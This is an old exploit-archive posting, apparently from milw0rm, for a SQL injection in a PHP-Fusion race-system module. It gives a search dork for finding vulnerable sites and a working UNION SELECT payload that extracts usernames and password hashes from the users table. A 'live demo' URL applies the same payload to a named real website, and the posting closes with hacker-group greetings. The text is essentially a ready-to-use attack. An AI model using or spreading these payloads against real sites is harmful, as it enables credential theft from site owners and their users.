######################################################## PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection Vulnerability ######################################################## ++++++++++++++++++++++++++++ Author : boom3rang webpage : www.khg-crew.ws greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=] ++++++++++++++++++++++++++++ [+] Dork: infusions/triscoop_race_system/race_details.php? [+] Example: http://localhost/infusions/triscoop_race_system/race_details.php?raceid=[ exploit ] [+] Exploit -------------------------------- http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users-- -------------------------------- [+] liveDEMO: http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users-- ============================ +Proud 2 be Albanian +Proud 2 be Muslim +United States of Albania ============================ # milw0rm.com [2008-10-05]